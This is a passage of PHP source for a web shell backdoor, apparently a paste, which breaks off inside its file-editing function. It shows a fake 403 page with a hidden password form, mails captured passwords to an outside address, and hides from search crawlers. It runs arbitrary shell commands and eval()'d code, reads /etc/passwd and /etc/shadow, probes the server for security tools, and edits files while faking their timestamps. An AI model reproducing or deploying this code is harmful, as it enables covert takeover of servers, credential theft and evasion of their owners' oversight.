· 5 years ago · Feb 11, 2020, 04:16 AM
1<?php
2if(array_key_exists('watching',$_POST)){
3 $tmp = $_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\n".$_POST['pass']; @mail('hard_linux@mail.ru', 'root', $tmp); // Edit or delete!
4}
5//-----------------Password---------------------
6$▛ = "da87382140869706ed7c660d1360954b";
7$▘ = true;
8$▜ = 'UTF-8';
9$▚ = 'FilesMan';
10$▙ = md5($_SERVER['HTTP_USER_AGENT']);
11if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])) {
12 prototype(md5($_SERVER['HTTP_HOST'])."key", $▙);
13}
14if(empty($_POST['charset']))
15 $_POST['charset'] = $▜;
16if (!isset($_POST['ne'])) {
17 if(isset($_POST['a'])) $_POST['a'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['a'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
18 if(isset($_POST['c'])) $_POST['c'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['c'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
19 if(isset($_POST['p1'])) $_POST['p1'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p1'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
20 if(isset($_POST['p2'])) $_POST['p2'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p2'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
21 if(isset($_POST['p3'])) $_POST['p3'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p3'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
22}
23function decrypt($str,$pwd){$pwd=base64_encode($pwd);$str=base64_decode($str);$enc_chr="";$enc_str="";$i=0;while($i<strlen($str)){for($j=0;$j<strlen($pwd);$j++){$enc_chr=chr(ord($str[$i])^ord($pwd[$j]));$enc_str.=$enc_chr;$i++;if($i>=strlen($str))break;}}return base64_decode($enc_str);}
24@ini_set('error_log',NULL);
25@ini_set('log_errors',0);
26@ini_set('max_execution_time',0);
27@set_time_limit(0);
28if (PHP_VERSION_ID < 70000)
29 @set_magic_quotes_runtime(0);
30@define('VERSION', '4.2.5');
31if(get_magic_quotes_gpc()) {
32 function stripslashes_array($array) {
33 return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
34 }
35 $_POST = stripslashes_array($_POST);
36 $_COOKIE = stripslashes_array($_COOKIE);
37}
38/* (С) 11.2011 oRb */
39if(!empty($▛)) {
40 if(isset($_POST['pass']) && (md5($_POST['pass']) == $▛))
41 prototype(md5($_SERVER['HTTP_HOST']), $▛);
42 if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $▛))
43 hardLogin();
44}
45if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax']))
46 $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$▘;
47function hardLogin() {
48 if(!empty($_SERVER['HTTP_USER_AGENT'])) {
49 $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
50 if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
51 header('HTTP/1.0 404 Not Found');
52 exit;
53 }
54 }
55 die("
56
57<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'>
58<html><head>
59<title>403 Forbidden</title>
60</head><body>
61<h1>Forbidden</h1>
62<p>You don't have permission to access this resource.</p>
63<p>Additionally, a 403 Forbidden
64error was encountered while trying to use an ErrorDocument to handle the request.</p>
65</body></html>
66
67
68<form method=post><br>
69<input type=password name=pass style='border: 0px solid transparent;'>
70<button type=submit name='watching' style='height:0px; width:0px; border:none; background-color: white;'></button></form>
71</pre>");
72}
73if(strtolower(substr(PHP_OS,0,3)) == "win")
74 $os = 'win';
75else
76 $os = 'nix';
77$safe_mode = @ini_get('safe_mode');
78if(!$safe_mode)
79 error_reporting(0);
80$disable_functions = @ini_get('disable_functions');
81$home_cwd = @getcwd();
82if(isset($_POST['c']))
83 @chdir($_POST['c']);
84$cwd = @getcwd();
85if($os == 'win') {
86 $home_cwd = str_replace("\\", "/", $home_cwd);
87 $cwd = str_replace("\\", "/", $cwd);
88}
89if($cwd[strlen($cwd)-1] != '/')
90 $cwd .= '/';
91/* (С) 04.2015 Pirat */
92function hardHeader() {
93 if(empty($_POST['charset']))
94 $_POST['charset'] = $GLOBALS['▜'];
95 echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>[] Bartes Dwiky []</title>
96
97<style>
98
99
100 body {background-color:#060A10; color:#e1e1e1; margin:0; font:normal 75% Arial, Helvetica, sans-serif; } canvas{ display: block; vertical-align: bottom;}
101 #particles-js{width: 100%; height: 100px; background-color: #060a10; background-image: url(''); background-repeat: no-repeat; background-size: cover; background-position: 50% 50%;}
102 body,td,th {font:10pt tahoma,arial,verdana,sans-serif,Lucida Sans;margin:0;vertical-align:top;}
103 table.info {color:#C3C3C3;}
104 table#toolsTbl {background-color: #060A10;}
105 span,h1,a {color:#fff !important;}
106 span {font-weight:bolder;}
107 h1 {border-left:5px solid #2E6E9C;padding:2px 5px;font:14pt Verdana;background-color:#10151c;margin:0px;}
108 div.content {padding:5px;margin-left:5px;background-color:#060a10;}
109 a {text-decoration:none;}
110 a:hover {text-decoration:underline;}
111 .tooltip::after {background:#0663D5;color:#FFF;content: attr(data-tooltip);margin-top:-50px;display:block;padding:6px 10px;position:absolute;visibility:hidden;}
112 .tooltip:hover::after {opacity:1;visibility:visible;}
113 .ml1 {border:1px solid #202832;padding:5px;margin:0;overflow:auto;}
114 .bigarea {min-width:100%;max-width:100%;height:400px;}
115 input, textarea, select {margin:0;color:#fff;background-color:#202832;border:none;font:9pt Courier New;outline:none;}
116 label {position:relative}
117 label:after {content:'<>';font:10px 'Consolas', monospace;color:#fff;-webkit-transform:rotate(90deg);-moz-transform:rotate(90deg);-ms-transform:rotate(90deg);transform:rotate(90deg);right:3px; top:3px;padding:0;position:absolute;pointer-events:none;}
118 label:before {content:'';right:0; top:0;width:17px; height:17px;background:#202832;position:absolute;pointer-events:none;display:block;}
119 form {margin:0px;}
120 #toolsTbl {text-align:center;}
121 #fak {background:none;}
122 #fak td {padding:5px 0 0 0;}
123 iframe {border:1px solid red;}
124 .toolsInp {width:300px}
125 .main th {text-align:left;background-color:#060a10;}
126 .main tr:hover{background-color:#354252;}
127 .main td, th{vertical-align:middle;}
128 input[type='submit']{background-color:#2E6E9C;}
129 input[type='button']{background-color:#2E6E9C;}
130 input[type='submit']:hover{background-color:#56AD15;}
131 input[type='button']:hover{background-color:#56AD15;}
132 .l1 {background-color:#202832;}
133 pre {font:9pt Courier New;}
134</style>
135<script>
136 var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
137 var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
138 var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
139 var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';
140 var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';
141 var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."';
142 var d = document;
143
144 function encrypt(str,pwd){if(pwd==null||pwd.length<=0){return null;}str=base64_encode(str);pwd=base64_encode(pwd);var enc_chr='';var enc_str='';var i=0;while(i<str.length){for(var j=0;j<pwd.length;j++){enc_chr=str.charCodeAt(i)^pwd.charCodeAt(j);enc_str+=String.fromCharCode(enc_chr);i++;if(i>=str.length)break;}}return base64_encode(enc_str);}
145 function utf8_encode(argString){var string=(argString+'');var utftext='',start,end,stringl=0;start=end=0;stringl=string.length;for(var n=0;n<stringl;n++){var c1=string.charCodeAt(n);var enc=null;if(c1<128){end++;}else if(c1>127&&c1<2048){enc=String.fromCharCode((c1>>6)|192)+String.fromCharCode((c1&63)|128);}else{enc=String.fromCharCode((c1>>12)|224)+String.fromCharCode(((c1>>6)&63)|128)+String.fromCharCode((c1&63)|128);}if(enc!==null){if(end>start){utftext+=string.slice(start,end);}utftext+=enc;start=end=n+1;}}if(end>start){utftext+=string.slice(start,stringl);}return utftext;}
146 function base64_encode(data){var b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var o1,o2,o3,h1,h2,h3,h4,bits,i=0,ac=0,enc='',tmp_arr=[];if (!data){return data;}data=utf8_encode(data+'');do{o1=data.charCodeAt(i++);o2=data.charCodeAt(i++);o3=data.charCodeAt(i++);bits=o1<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;tmp_arr[ac++]=b64.charAt(h1)+b64.charAt(h2)+b64.charAt(h3)+b64.charAt(h4);}while(i<data.length);enc=tmp_arr.join('');switch (data.length%3){case 1:enc=enc.slice(0,-2)+'==';break;case 2:enc=enc.slice(0,-1)+'=';break;}return enc;}
147 function set(a,c,p1,p2,p3,charset) {
148 if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
149 if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
150 if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
151 if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
152 if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
153 d.mf.a.value = encrypt(d.mf.a.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
154 d.mf.c.value = encrypt(d.mf.c.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
155 d.mf.p1.value = encrypt(d.mf.p1.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
156 d.mf.p2.value = encrypt(d.mf.p2.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
157 d.mf.p3.value = encrypt(d.mf.p3.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
158 if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
159 }
160 function g(a,c,p1,p2,p3,charset) {
161 set(a,c,p1,p2,p3,charset);
162 d.mf.submit();
163 }
164 function a(a,c,p1,p2,p3,charset) {
165 set(a,c,p1,p2,p3,charset);
166 var params = 'ajax=true';
167 for(i=0;i<d.mf.elements.length;i++)
168 params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
169 sr('" . addslashes($_SERVER['REQUEST_URI']) ."', params);
170 }
171 function sr(url, params) {
172 if (window.XMLHttpRequest)
173 req = new XMLHttpRequest();
174 else if (window.ActiveXObject)
175 req = new ActiveXObject('Microsoft.XMLHTTP');
176 if (req) {
177 req.onreadystatechange = processReqChange;
178 req.open('POST', url, true);
179 req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
180 req.send(params);
181 }
182 }
183 function processReqChange() {
184 if( (req.readyState == 4) )
185 if(req.status == 200) {
186 var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');
187 var arr=reg.exec(req.responseText);
188 eval(arr[2].substr(0, arr[1]));
189 } else alert('Request error!');
190 }
191</script>
192
193<head><body><div style='position:absolute;background-color:rgba(95, 110, 130, 0.3);width:100%;top:0;left:0;'>
194<form method=post name=mf style='display:none;'>
195<input type=hidden name=a>
196<input type=hidden name=c>
197<input type=hidden name=p1>
198<input type=hidden name=p2>
199<input type=hidden name=p3>
200<input type=hidden name=charset>
201</form>";
202 $freeSpace = @diskfreespace($GLOBALS['cwd']);
203 $totalSpace = @disk_total_space($GLOBALS['cwd']);
204 $totalSpace = $totalSpace?$totalSpace:1;
205 $release = @php_uname('r');
206 $kernel = @php_uname('s');
207 $explink = 'http://noreferer.de/?http://www.exploit-db.com/search/?action=search&description=';
208 if(strpos('Linux', $kernel) !== false)
209 $explink .= urlencode('Linux Kernel ' . substr($release,0,6));
210 else
211 $explink .= urlencode($kernel . ' ' . substr($release,0,3));
212 if(!function_exists('posix_getegid')) {
213 $user = @get_current_user();
214 $uid = @getmyuid();
215 $gid = @getmygid();
216 $group = "?";
217 } else {
218 $uid = @posix_getpwuid(@posix_geteuid());
219 $gid = @posix_getgrgid(@posix_getegid());
220 $user = $uid['name'];
221 $uid = $uid['uid'];
222 $group = $gid['name'];
223 $gid = $gid['gid'];
224 }
225 $cwd_links = '';
226 $path = explode("/", $GLOBALS['cwd']);
227 $n=count($path);
228 for($i=0; $i<$n-1; $i++) {
229 $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
230 for($j=0; $j<=$i; $j++)
231 $cwd_links .= $path[$j].'/';
232 $cwd_links .= "\")'>".$path[$i]."/</a>";
233 }
234 $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
235 $opt_charsets = '';
236 foreach($charsets as $▟)
237 $opt_charsets .= '<option value="'.$▟.'" '.($_POST['charset']==$▟?'selected':'').'>'.$▟.'</option>';
238 $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Infect'=>'Infect','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network');
239 if(!empty($GLOBALS['▛']))
240 $m['Logout'] = 'Logout';
241 $m['Self remove'] = 'SelfRemove';
242 $menu = '';
243 foreach($m as $k => $v)
244 $menu .= '<th>[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>';
245 $drives = "";
246 if ($GLOBALS['os'] == 'win') {
247 foreach(range('c','z') as $drive)
248 if (is_dir($drive.':\\'))
249 $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
250 }
251 /* (С) 08.2015 dmkcv */
252 echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:'.($GLOBALS['os'] == 'win'?'<br>Drives:':'').'</span></td>'.
253 '<td><nobr>'.substr(@php_uname(), 0, 120).' <a href="http://noreferer.de/?http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[ Google ]</a> <a href="'.$explink.'" target=_blank>[ Exploit-DB ]</a></nobr><br>'.$uid.' ( '.$user.' ) <span>Group:</span> '.$gid.' ( ' .$group. ' )<br>'.@phpversion().' <span>Safe mode:</span> '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=#FFDB5F><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').'<br>'.viewSize($totalSpace).' <span>Free:</span> '.viewSize($freeSpace).' ('.round(100/($totalSpace/$freeSpace),2).'%)<br>'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a><br>'.$drives.'</td>'.
254 '<td width=1 align=right><nobr><label><select onchange="g(null,null,null,null,null,this.value)">'.$opt_charsets.'</select></label><br><span>Server IP:</span><br>'.gethostbyname($_SERVER["HTTP_HOST"]).'<br><span>Client IP:</span><br>'.$_SERVER['REMOTE_ADDR'].'</nobr></td></tr></table>'.
255 '<table style="background-color:#2E6E9C;" cellpadding=3 cellspacing=0 width=100%><tr>'.$menu.'</tr></table><div>';
256}
257function hardFooter() {
258 $is_writable = is_writable($GLOBALS['cwd'])?" <font color='#FFDB5F'>[ Writeable ]</font>":" <font color=red>(Not writable)</font>";
259 echo "
260</div>
261<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%>
262 <tr>
263 <td><form onsubmit=\"".( function_exists('actionFilesMan')? "g(null,this.c.value,'');":'' )."return false;\"><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'><input type=submit value='submit'></form></td>
264 <td><form onsubmit=\"".(function_exists('actionFilesTools')? "g('FilesTools',null,this.f.value);":'' )."return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f required><input type=submit value='submit'></form></td>
265 </tr><tr>
266 <td><form onsubmit=\"".( function_exists('actionFilesMan')? "g('FilesMan',null,'mkdir',this.d.value);":'' )."return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d required><input type=submit value='submit'></form></td>
267 <td><form onsubmit=\"".( function_exists('actionFilesTools')? "g('FilesTools',null,this.f.value,'mkfile');":'' )."return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f required><input type=submit value='submit'></form></td>
268 </tr><tr>
269 <td><form onsubmit=\"".( function_exists('actionConsole')? "g('Console',null,this.c.value);":'' )."return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='submit'></form></td>
270 <td><form method='post' ".( (!function_exists('actionFilesMan'))? " onsubmit=\"return false;\" ":'' )."ENCTYPE='multipart/form-data'>
271 <input type=hidden name=a value='FilesMan'>
272 <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'>
273 <input type=hidden name=p1 value='uploadFile'>
274 <input type=hidden name=ne value=''>
275 <input type=hidden name=charset value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
276 <span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f[] multiple><input type=submit value='submit'></form><br ></td>
277 </tr></table></div>
278 <!-- particles --> <div id='particles-js'></div><script src='http://cdn.jsdelivr.net/particles.js/2.0.0/particles.min.js'></script>
279 <script>particlesJS('particles-js', {'particles':{'number':{'value':80,'density':{'enable':true,'value_area':800}},'color':{'value':'#ffffff'},'shape':{'type':'triangle','stroke':{'width':0,'color':'#000000'},'polygon':{'nb_sides':5},'image':{'src':'img/github.svg','width':100,'height':100}},'opacity':{'value':0.5,'random':true,'anim':{'enable':false,'speed':1,'opacity_min':0.1,'sync':false}},'size':{'value':3,'random':true,'anim':{'enable':false,'speed':40,'size_min':0.1,'sync':false}},'line_linked':{'enable':true,'distance':200,'color':'#ffffff','opacity':0.4,'width':1},'move':{'enable':true,'speed':1,'direction':'none','random':true,'straight':false,'out_mode':'out','bounce':false,'attract':{'enable':false,'rotateX':10000,'rotateY':10000}}},'interactivity':{'detect_on':'canvas','events':{'onhover':{'enable':true,'mode':'grab'},'onclick':{'enable':true,'mode':'repulse'},'resize':true},'modes':{'grab':{'distance':200,'line_linked':{'opacity':0.5}},'bubble':{'particles_nb':2}}},'retina_detect':true});</script>
280 </body></html>";
281}
282if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) { function posix_getpwuid($p) {return false;} }
283if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) { function posix_getgrgid($p) {return false;} }
284function ex($in) {
285 $▖ = '';
286 if (function_exists('exec')) {
287 @exec($in,$▖);
288 $▖ = @join("\n",$▖);
289 } elseif (function_exists('passthru')) {
290 ob_start();
291 @passthru($in);
292 $▖ = ob_get_clean();
293 } elseif (function_exists('system')) {
294 ob_start();
295 @system($in);
296 $▖ = ob_get_clean();
297 } elseif (function_exists('shell_exec')) {
298 $▖ = shell_exec($in);
299 } elseif (is_resource($f = @popen($in,"r"))) {
300 $▖ = "";
301 while(!@feof($f))
302 $▖ .= fread($f,1024);
303 pclose($f);
304 }else return "↳ Unable to execute command\n";
305 return ($▖==''?"↳ Query did not return anything\n":$▖);
306}
307function viewSize($s) {
308 if($s >= 1073741824)
309 return sprintf('%1.2f', $s / 1073741824 ). ' GB';
310 elseif($s >= 1048576)
311 return sprintf('%1.2f', $s / 1048576 ) . ' MB';
312 elseif($s >= 1024)
313 return sprintf('%1.2f', $s / 1024 ) . ' KB';
314 else
315 return $s . ' B';
316}
317function perms($p) {
318 if (($p & 0xC000) == 0xC000)$i = 's';
319 elseif (($p & 0xA000) == 0xA000)$i = 'l';
320 elseif (($p & 0x8000) == 0x8000)$i = '-';
321 elseif (($p & 0x6000) == 0x6000)$i = 'b';
322 elseif (($p & 0x4000) == 0x4000)$i = 'd';
323 elseif (($p & 0x2000) == 0x2000)$i = 'c';
324 elseif (($p & 0x1000) == 0x1000)$i = 'p';
325 else $i = 'u';
326 $i .= (($p & 0x0100) ? 'r' : '-');
327 $i .= (($p & 0x0080) ? 'w' : '-');
328 $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
329 $i .= (($p & 0x0020) ? 'r' : '-');
330 $i .= (($p & 0x0010) ? 'w' : '-');
331 $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
332 $i .= (($p & 0x0004) ? 'r' : '-');
333 $i .= (($p & 0x0002) ? 'w' : '-');
334 $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
335 return $i;
336}
337function viewPermsColor($f) {
338 if (!@is_readable($f))
339 return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>';
340 elseif (!@is_writable($f))
341 return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>';
342 else
343 return '<font color=#FFDB5F><b>'.perms(@fileperms($f)).'</b></font>';
344}
345function hardScandir($dir) {
346 if(function_exists("scandir")) {
347 return scandir($dir);
348 } else {
349 $dh = opendir($dir);
350 while (false !== ($filename = readdir($dh)))
351 $files[] = $filename;
352 return $files;
353 }
354}
355function which($p) {
356 $path = ex('which ' . $p);
357 if(!empty($path))
358 return $path;
359 return false;
360}
361function actionRC() {
362 if(!@$_POST['p1']) {
363 $a = array(
364 "uname" => php_uname(),
365 "php_version" => phpversion(),
366 "VERSION" => VERSION,
367 "safemode" => @ini_get('safe_mode')
368 );
369 echo serialize($a);
370 } else {
371 eval($_POST['p1']);
372 }
373}
374function prototype($k, $v) {
375 $_COOKIE[$k] = $v;
376 setcookie($k, $v);
377}
378function actionSecInfo() {
379 hardHeader();
380 echo '<h1>Server security information</h1><div class=content>';
381 function showSecParam($n, $v) {
382 $v = trim($v);
383 if($v) {
384 echo '<span>' . $n . ': </span>';
385 if(strpos($v, "\n") === false)
386 echo $v . '<br>';
387 else
388 echo '<pre class=ml1>' . $v . '</pre>';
389 }
390 }
391 showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
392 if(function_exists('apache_get_modules'))
393 showSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
394 showSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none');
395 showSecParam('Open base dir', @ini_get('open_basedir'));
396 showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
397 showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
398 showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
399 $temp=array();
400 if(function_exists('mysql_get_client_info'))
401 $temp[] = "MySql (".mysql_get_client_info().")";
402 if(function_exists('mssql_connect'))
403 $temp[] = "MSSQL";
404 if(function_exists('pg_connect'))
405 $temp[] = "PostgreSQL";
406 if(function_exists('oci_connect'))
407 $temp[] = "Oracle";
408 showSecParam('Supported databases', implode(', ', $temp));
409 echo '<br>';
410 if($GLOBALS['os'] == 'nix') {
411 showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
412 showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>":'no');
413 showSecParam('OS version', @file_get_contents('/proc/version'));
414 showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
415 if(!$GLOBALS['safe_mode']) {
416 $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
417 $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
418 $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
419 echo '<br>';
420 $temp=array();
421 foreach ($userful as $▟)
422 if(which($▟))
423 $temp[] = $▟;
424 showSecParam('Userful', implode(', ',$temp));
425 $temp=array();
426 foreach ($danger as $▟)
427 if(which($▟))
428 $temp[] = $▟;
429 showSecParam('Danger', implode(', ',$temp));
430 $temp=array();
431 foreach ($downloaders as $▟)
432 if(which($▟))
433 $temp[] = $▟;
434 showSecParam('Downloaders', implode(', ',$temp));
435 echo '<br/>';
436 showSecParam('HDD space', ex('df -h'));
437 showSecParam('Hosts', @file_get_contents('/etc/hosts'));
438 showSecParam('Mount options', @file_get_contents('/etc/fstab'));
439 }
440 } else {
441 showSecParam('OS Version',ex('ver'));
442 showSecParam('Account Settings', iconv('CP866', 'UTF-8',ex('net accounts')));
443 showSecParam('User Accounts', iconv('CP866', 'UTF-8',ex('net user')));
444 }
445 echo '</div>';
446 hardFooter();
447}
448function actionFilesTools() {
449 if( isset($_POST['p1']) )
450 $_POST['p1'] = urldecode($_POST['p1']);
451 if(@$_POST['p2']=='download') {
452 if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
453 ob_start("ob_gzhandler", 4096);
454 header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
455 if (function_exists("mime_content_type")) {
456 $type = @mime_content_type($_POST['p1']);
457 header("Content-Type: " . $type);
458 } else
459 header("Content-Type: application/octet-stream");
460 $fp = @fopen($_POST['p1'], "r");
461 if($fp) {
462 while(!@feof($fp))
463 echo @fread($fp, 1024);
464 fclose($fp);
465 }
466 }exit;
467 }
468 if( @$_POST['p2'] == 'mkfile' ) {
469 if(!file_exists($_POST['p1'])) {
470 $fp = @fopen($_POST['p1'], 'w');
471 if($fp) {
472 $_POST['p2'] = "edit";
473 fclose($fp);
474 }
475 }
476 }
477 hardHeader();
478 echo '<h1>File tools</h1><div class=content>';
479 if( !file_exists(@$_POST['p1']) ) {
480 echo 'File not exists';
481 hardFooter();
482 return;
483 }
484 $uid = @posix_getpwuid(@fileowner($_POST['p1']));
485 if(!$uid) {
486 $uid['name'] = @fileowner($_POST['p1']);
487 $gid['name'] = @filegroup($_POST['p1']);
488 } else $gid = @posix_getgrgid(@filegroup($_POST['p1']));
489 echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
490 echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
491 if( empty($_POST['p2']) )
492 $_POST['p2'] = 'view';
493 if( is_file($_POST['p1']) )
494 $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch', 'Frame');
495 else
496 $m = array('Chmod', 'Rename', 'Touch');
497 foreach($m as $v)
498 echo '<a href=# onclick="g(null,null,\'' . urlencode($_POST['p1']) . '\',\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
499 echo '<br><br>';
500 switch($_POST['p2']) {
501 case 'view':
502 echo '<pre class=ml1>';
503 $fp = @fopen($_POST['p1'], 'r');
504 if($fp) {
505 while( !@feof($fp) )
506 echo htmlspecialchars(@fread($fp, 1024));
507 @fclose($fp);
508 }
509 echo '</pre>';
510 break;
511 case 'highlight':
512 if( @is_readable($_POST['p1']) ) {
513 echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
514 $oRb = @highlight_file($_POST['p1'],true);
515 echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$oRb).'</div>';
516 }
517 break;
518 case 'chmod':
519 if( !empty($_POST['p3']) ) {
520 $perms = 0;
521 for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
522 $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
523 if(!@chmod($_POST['p1'], $perms))
524 echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
525 }
526 clearstatcache();
527 echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value="submit"></form>';
528 break;
529 case 'edit':
530 if( !is_writable($_POST['p1'])) {
531 echo 'File isn\'t writeable';
532 break;
533 }
534 if( !empty($_POST['p3']) ) {
535 $time = @filemtime($_POST['p1']);
536 $_POST['p3'] = substr($_POST['p3'],1);
537 $fp = @fopen($_POST['p1'],"w");
538 if($fp) {
539 @fwrite($fp,$_POST['p3']);
540 @fclose($fp);
541 echo 'Saved!<br><script>p3_="";</script>';
542 @touch($_POST['p1'],$time,$time);
543 }
544 }
545 echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>';
546 $fp = @fopen($_POST['p1'], 'r');
547 if($fp) {
548 while( !@feof($fp) )
